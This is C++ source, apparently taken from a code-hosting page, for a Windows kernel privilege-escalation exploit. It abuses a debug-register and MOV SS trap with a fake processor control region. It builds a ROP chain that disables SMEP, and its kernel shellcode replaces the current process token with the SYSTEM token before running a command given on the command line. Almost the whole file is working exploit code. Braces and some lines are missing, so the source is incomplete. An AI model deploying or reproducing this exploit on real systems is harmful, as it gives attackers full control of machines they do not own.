388 lines
14 KiB
Executable File
388 lines
14 KiB
Executable File
#include <iostream>
#include <Windows.h>
#include <intrin.h>
#include "KernelRoutines.h"
#include "LockedMemory.h"
#include "Native.h"
#include "Error.h"
struct ISR_STACK
uint64_t RIP;
uint64_t CS;
uint64_t EF;
uint64_t RSP;
// Doensn't really change
static const uint32_t Offset_Pcr__Self = 0x18;
static const uint32_t Offset_Pcr__CurrentPrcb = 0x20;
static const uint32_t Offset_Pcr__Prcb = 0x180;
static const uint32_t Offset_Prcb__CurrentThread = 0x8;
static const uint32_t Offset_Context__XMM13 = 0x270;
static const uint32_t MxCsr__DefVal = 0x1F80;
static const uint32_t Offset_Prcb__RspBase = 0x28;
static const uint32_t Offset_KThread__InitialStack = 0x28;
static const uint32_t Offset_Prcb__Cr8 = 0x100 + 0xA0;
static const uint32_t Offset_Prcb__Cr4 = 0x100 + 0x18;
// Requires patterns
NON_PAGED_DATA static uint32_t Offset_Prcb__Context = 0x0; // @KeBugCheckEx
NON_PAGED_DATA static uint32_t Offset_KThread__ApcStateFill__Process = 0x0; // @PsGetCurrentProcess
NON_PAGED_DATA uint64_t ContextBackup[ 10 ];
NON_PAGED_DATA fnFreeCall k_PsDereferencePrimaryToken = 0;
NON_PAGED_DATA fnFreeCall k_PsReferencePrimaryToken = 0;
NON_PAGED_DATA fnFreeCall k_PsGetCurrentProcess = 0;
NON_PAGED_DATA uint64_t* k_PsInitialSystemProcess = 0;
NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0;
using fnIRetToVulnStub = void( * )( uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup );
0x0F, 0x22, 0xE1, // mov cr4, rcx ; cr4 = original cr4
0x48, 0x89, 0xD4, // mov rsp, rdx ; stack = isr stack
0x4C, 0x89, 0xC1, // mov rcx, r8 ; rcx = ContextBackup
0xFB, // sti ; enable interrupts
0x48, 0x31, 0xC0, // xor rax, rax ; lower irql to passive_level
0x44, 0x0F, 0x22, 0xC0, // mov cr8, rax
0x48, 0xCF // iretq ; interrupt return
NON_PAGED_DATA uint64_t PredictedNextRsp = 0;
NON_PAGED_DATA ptrdiff_t StackDelta = 0;
NON_PAGED_CODE void KernelShellcode()
__writedr( 7, 0 );
uint64_t Cr4Old = __readgsqword( Offset_Pcr__Prcb + Offset_Prcb__Cr4 );
__writecr4( Cr4Old & ~( 1 << 20 ) );
// Uncomment if it bugchecks to debug:
// __writedr( 2, StackDelta );
// __writedr( 3, PredictedNextRsp );
// __debugbreak();
// ^ This will let you see StackDelta and RSP clearly in a crash dump so you can check where the process went bad
uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38;
// Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiTrapDebugOrFault
while (
( ( ISR_STACK* ) IsrStackIterator )->CS == 0x10 &&
( ( ISR_STACK* ) IsrStackIterator )->RIP > 0x7FFFFFFEFFFF )
__rollback_isr( IsrStackIterator );
// We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta
if ( ( ( ISR_STACK* ) ( IsrStackIterator + 0x30 ) )->CS == 0x33 )
fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap
fffff00e`d7a1bc40 0000000000000010
fffff00e`d7a1bc48 0000000000000002
fffff00e`d7a1bc50 fffff00ed7a1bc68
fffff00e`d7a1bc58 0000000000000000
fffff00e`d7a1bc60 0000000000000014
fffff00e`d7a1bc68 00007ff7e2261e95 --
fffff00e`d7a1bc70 0000000000000033
fffff00e`d7a1bc78 0000000000000202
fffff00e`d7a1bc80 000000ad39b6f938
IsrStackIterator = IsrStackIterator + 0x30;
IsrStackIterator -= StackDelta;
PVOID KStub = ( PVOID ) k_ExAllocatePool( 0ull, ( uint64_t )sizeof( IRetToVulnStub ) );
Np_memcpy( KStub, IRetToVulnStub, sizeof( IRetToVulnStub ) );
// ------ KERNEL CODE ------
uint64_t SystemProcess = *k_PsInitialSystemProcess;
uint64_t CurrentProcess = k_PsGetCurrentProcess();
uint64_t CurrentToken = k_PsReferencePrimaryToken( CurrentProcess );
uint64_t SystemToken = k_PsReferencePrimaryToken( SystemProcess );
for ( int i = 0; i < 0x500; i += 0x8 )
uint64_t Member = *( uint64_t * ) ( CurrentProcess + i );
if ( ( Member & ~0xF ) == CurrentToken )
*( uint64_t * ) ( CurrentProcess + i ) = SystemToken;
k_PsDereferencePrimaryToken( CurrentToken );
k_PsDereferencePrimaryToken( SystemToken );
// ------ KERNEL CODE ------
( ( ISR_STACK* ) IsrStackIterator )->RIP += 1;
( fnIRetToVulnStub( KStub ) )( Cr4Old, IsrStackIterator, ContextBackup );
PUCHAR AllocateLockedMemoryForKernel( SIZE_T Sz )
ZeroMemory( Va, Sz );
for ( int i = 0; i < Sz; i += 0x1000 )
Np_TryLockPage( Va + i );
return Va;
int main(int argc, char *argv[])
if (argc < 2){
return 0;
// Pre-init checks: KVA Shadow
if ( !NtQuerySystemInformation( SystemKernelVaShadowInformation, &KvaInfo, ( uint64_t ) sizeof( KvaInfo ), 0ull ) )
assert( !KvaInfo.KvaShadowFlags.KvaShadowEnabled );
// Initialization: Memory allocation, locking sections, loading nt
SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xA );
assert( Np_LockSections() );
assert( Np_TryLockPage( &__rollback_isr ) );
assert( Np_TryLockPage( &__swapgs ) );
KernelContext* KrCtx = Kr_InitContext();
assert( KrCtx );
static PUCHAR Pcr = AllocateLockedMemoryForKernel( 0x10000 );
static PUCHAR KThread = AllocateLockedMemoryForKernel( 0x10000 );
static PUCHAR KProcess = AllocateLockedMemoryForKernel( 0x10000 );
static PUCHAR Prcb = Pcr + Offset_Pcr__Prcb;
// Offsets: Finding offsets and ROP gadgets
SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xB );
PIMAGE_NT_HEADERS FileHeader = ( PIMAGE_NT_HEADERS ) ( ( uint64_t ) DosHeader + DosHeader->e_lfanew );
PIMAGE_SECTION_HEADER SectionHeader = ( PIMAGE_SECTION_HEADER ) ( ( ( uint64_t ) &FileHeader->OptionalHeader ) + FileHeader->FileHeader.SizeOfOptionalHeader );
while ( _strcmpi( ( char* ) SectionHeader->Name, ".text" ) ) SectionHeader++;
uint64_t AdrRetn = 0;
uint64_t AdrPopRcxRetn = 0;
uint64_t AdrSetCr4Retn = 0;
PUCHAR NtBegin = ( PUCHAR ) KrCtx->NtLib + SectionHeader->VirtualAddress;
PUCHAR NtEnd = NtBegin + SectionHeader->Misc.VirtualSize;
// Find [RETN]
for ( PUCHAR It = NtBegin; It < NtEnd; It++ )
if ( It[ 0 ] == 0xC3 )
AdrRetn = It - ( PUCHAR ) KrCtx->NtLib + KrCtx->NtBase;
// Find [POP RCX; RETN]
for ( PUCHAR It = NtBegin; It < NtEnd; It++ )
if ( It[ 0 ] == 0x59 && It[ 1 ] == 0xC3 )
AdrPopRcxRetn = It - ( PUCHAR ) KrCtx->NtLib + KrCtx->NtBase;
// Find [MOV CR4, RCX; RETN]
for ( PUCHAR It = NtBegin; It < NtEnd; It++ )
if ( It[ 0 ] == 0x0F && It[ 1 ] == 0x22 &&
It[ 2 ] == 0xE1 && It[ 3 ] == 0xC3 )
AdrSetCr4Retn = It - ( PUCHAR ) KrCtx->NtLib + KrCtx->NtBase;
printf( "[+] [RETN] Gadget @ %16llx\n", AdrRetn );
printf( "[+] [POP RCX; RETN] Gadget @ %16llx\n", AdrPopRcxRetn );
printf( "[+] [MOV CR4, RCX; RETN] Gadget @ %16llx\n", AdrSetCr4Retn );
assert( AdrRetn );
assert( AdrPopRcxRetn );
assert( AdrSetCr4Retn );
PUCHAR UPsGetCurrentProcess = ( PUCHAR ) GetProcAddress( KrCtx->NtLib, "PsGetCurrentProcess" );
PUCHAR UKeBugCheckEx = ( PUCHAR ) GetProcAddress( KrCtx->NtLib, "KeBugCheckEx" );
for ( int i = 0; i < 0x50; i++ )
if ( UKeBugCheckEx[ i ] == 0x48 && UKeBugCheckEx[ i + 1 ] == 0x8B && // mov rax,
UKeBugCheckEx[ i + 7 ] == 0xE8 ) // call
Offset_Prcb__Context = *( int32_t * ) ( UKeBugCheckEx + i + 3 );
for ( int i = 0; i < 0x50; i++ )
if ( UPsGetCurrentProcess[ i ] == 0x48 && UPsGetCurrentProcess[ i + 1 ] == 0x8B && // mov rax,
UPsGetCurrentProcess[ i + 7 ] == 0xC3 ) // retn
Offset_KThread__ApcStateFill__Process = *( int32_t * ) ( UPsGetCurrentProcess + i + 3 );
SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xD );
printf( "[+] Prcb.Context @ %16llx\n", Offset_Prcb__Context );
printf( "[+] KThread.ApcStateFill.Process @ %16llx\n", Offset_KThread__ApcStateFill__Process );
assert( Offset_Prcb__Context );
assert( Offset_KThread__ApcStateFill__Process );
// Setting up GSBASE
SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xC );
*( PVOID* ) ( Pcr + Offset_Pcr__Self ) = Pcr; // Pcr.Self
*( PVOID* ) ( Pcr + Offset_Pcr__CurrentPrcb ) = Pcr + Offset_Pcr__Prcb; // Pcr.CurrentPrcb
*( DWORD* ) ( Prcb ) = MxCsr__DefVal; // Prcb.MxCsr
*( PVOID* ) ( Prcb + Offset_Prcb__CurrentThread ) = KThread; // Prcb.CurrentThread
*( PVOID* ) ( Prcb + Offset_Prcb__Context ) = Prcb + 0x3000; // Prcb.Context, Placeholder
*( PVOID* ) ( KThread + Offset_KThread__ApcStateFill__Process ) = KProcess; // EThread.ApcStateFill.EProcess
*( PVOID* ) ( Prcb + Offset_Prcb__RspBase ) = (PVOID) 1; // Prcb.RspBase
*( PVOID* ) ( KThread + Offset_KThread__InitialStack ) = 0; // EThread.InitialStack
printf( "[+] Finished setting up fake PCR!\n" );
printf( "[+] Pcr @ %16llx\n", Pcr );
printf( "[+] Prcb @ %16llx\n", Prcb );
printf( "[+] EThread @ %16llx\n", KThread );
printf( "[+] EProcess @ %16llx\n", KProcess );
NON_PAGED_DATA static DWORD SavedSS = __readss();
// Execute Exploit!
SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xF );
HANDLE ThreadHandle = CreateThread( 0, 0, [ ] ( LPVOID ) -> DWORD
volatile PCONTEXT Ctx = *( volatile PCONTEXT* ) ( Prcb + Offset_Prcb__Context );
while ( !Ctx->Rsp ); // Wait for RtlCaptureContext to be called once so we get leaked RSP
uint64_t StackInitial = Ctx->Rsp;
while ( Ctx->Rsp == StackInitial ); // Wait for it to be called another time so we get the stack pointer difference
// between sequential KiDebugTrapOrFault's
StackDelta = Ctx->Rsp - StackInitial;
PredictedNextRsp = Ctx->Rsp + StackDelta; // Predict next RSP value when RtlCaptureContext is called
uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8; // Predict where the return pointer will be located at
NextRetPtrStorage &= ~0xF;
*( uint64_t* ) ( Prcb + Offset_Prcb__Context ) = NextRetPtrStorage - Offset_Context__XMM13;
// Make RtlCaptureContext write XMM13-XMM15 over it
return 0;
}, 0, 0, 0 );
assert( ThreadHandle );
printf( "\n- Created context watchdog\n" );
printf( "- Thread Id: %16llx\n", ( HANDLE ) GetThreadId( ThreadHandle ) );
assert( SetThreadPriority( ThreadHandle, THREAD_PRIORITY_TIME_CRITICAL ) );
printf( "- Elevated priority to: THREAD_PRIORITY_TIME_CRITICAL\n" );
SetThreadAffinityMask( ThreadHandle, 0xFFFFFFFE );
SetThreadAffinityMask( HANDLE( -2 ), 0x00000001 );
printf( "- Seperated exploit and context watchdog processors\n" );
k_ExAllocatePool = KrCtx->GetProcAddress<>( "ExAllocatePool" );
k_PsReferencePrimaryToken = KrCtx->GetProcAddress<>( "PsReferencePrimaryToken" );
k_PsDereferencePrimaryToken = KrCtx->GetProcAddress<>( "PsDereferencePrimaryToken" );
k_PsGetCurrentProcess = KrCtx->GetProcAddress<>( "PsGetCurrentProcess" );
k_PsInitialSystemProcess = KrCtx->GetProcAddress<uint64_t*>( "PsInitialSystemProcess" );
printf( "\n" );
printf( "- PsInitialSystemProcess: %16llx\n", k_PsInitialSystemProcess );
printf( "- PsGetCurrentProcess: %16llx\n", k_PsGetCurrentProcess );
printf( "- PsReferencePrimaryToken: %16llx\n", k_PsReferencePrimaryToken );
printf( "- PsDereferencePrimaryToken: %16llx\n", k_PsDereferencePrimaryToken );
printf( "- ExAllocatePool: %16llx\n", k_ExAllocatePool );
printf( "\n" );
printf( "/--------------------------------------\\\n" );
printf( "| Press any key to start exploit! |\n" );
printf( "| Warning: This may bugcheck your PC. |\n" );
printf( "\\--------------------------------------/\n" );
//system( "pause>nul" );
printf( "\n" );
CONTEXT Ctx = { 0 };
Ctx.Dr0 = ( uint64_t ) &SavedSS; // Trap SS
Ctx.Dr1 = ( uint64_t ) Prcb + Offset_Prcb__Cr8; // Trap KiSaveProcessorControlState, Cr8 storage
Ctx.Dr7 =
( 1 << 0 ) | ( 3 << 16 ) | ( 3 << 18 ) | // R/W, 4 Bytes, Active
( 1 << 2 ) | ( 3 << 20 ) | ( 2 << 22 ); // W, 8 Bytes, Active
printf( "[+] Setting up debug registers:\n" );
SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xD );
printf( "Dr0: %16llx [@SavedSS] (R/W, 4 Bytes, Active)\n", Ctx.Dr0 );
printf( "Dr1: %16llx [@SpecialRegisters.CR4] (W, 8 Bytes, Active)\n", Ctx.Dr1 );
SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xF );
assert( SetThreadContext( HANDLE( -2 ), &Ctx ) );
printf( "\n" );
uint64_t RetnRetn[ 2 ] = { AdrRetn, AdrRetn };
uint64_t PopRcxRetnRcx[ 2 ] = { AdrPopRcxRetn, 0x506f8 };
uint64_t SetCr4Retn[ 2 ] = { AdrSetCr4Retn, ( uint64_t ) &KernelShellcode };
// RSP:
__setxmm13( ( BYTE* ) RetnRetn ); // &retn // we need to align xmm writes so two place holders just incase!
// &retn
__setxmm14( ( BYTE* ) PopRcxRetnRcx ); // &pop rcx
// 0x506f8
__setxmm15( ( BYTE* ) SetCr4Retn ); // &mov cr4, rcx; retn
// &KernelShellcode
printf( "[+] Built ROP Chain:\n" );
SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xD );
printf( "-- &retn; (%016llx)\n", RetnRetn[ 0 ] );
printf( "-- &retn; (%016llx)\n", RetnRetn[ 1 ] );
printf( "-- &pop rcx; retn; (%016llx)\n", PopRcxRetnRcx[ 0 ] );
printf( "-- cr4_nosmep (%016llx)\n", PopRcxRetnRcx[ 1 ] );
printf( "-- &mov cr4, rcx; retn; (%016llx)\n", SetCr4Retn[ 0 ] );
printf( "-- &KernelShellcode (%016llx)\n", SetCr4Retn[ 1 ] );
SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xF );
printf( "\n" );
PVOID ProperGsBase = __read_gs_base();
printf( "[+] Writing fake PCR as new GSBASE: %16llx\n", Pcr );
printf( "[+] Defering debug exception...\n" );
__set_gs_base( Pcr );
__triggervuln( ContextBackup, &SavedSS ); // Let the fun begin
__set_gs_base( ProperGsBase );
printf( "[+] Restored old GSBASE: %16llx\n", ProperGsBase );
SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xA );
printf( "[+] Exploit successful!\n\n" );
SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xF );
printf( "/------------------------------------------\\\n" );
printf( "| Press any key to launch a system console |\n" );
printf( "\\------------------------------------------/" );
//system( "pause>nul" );
system( argv[1] );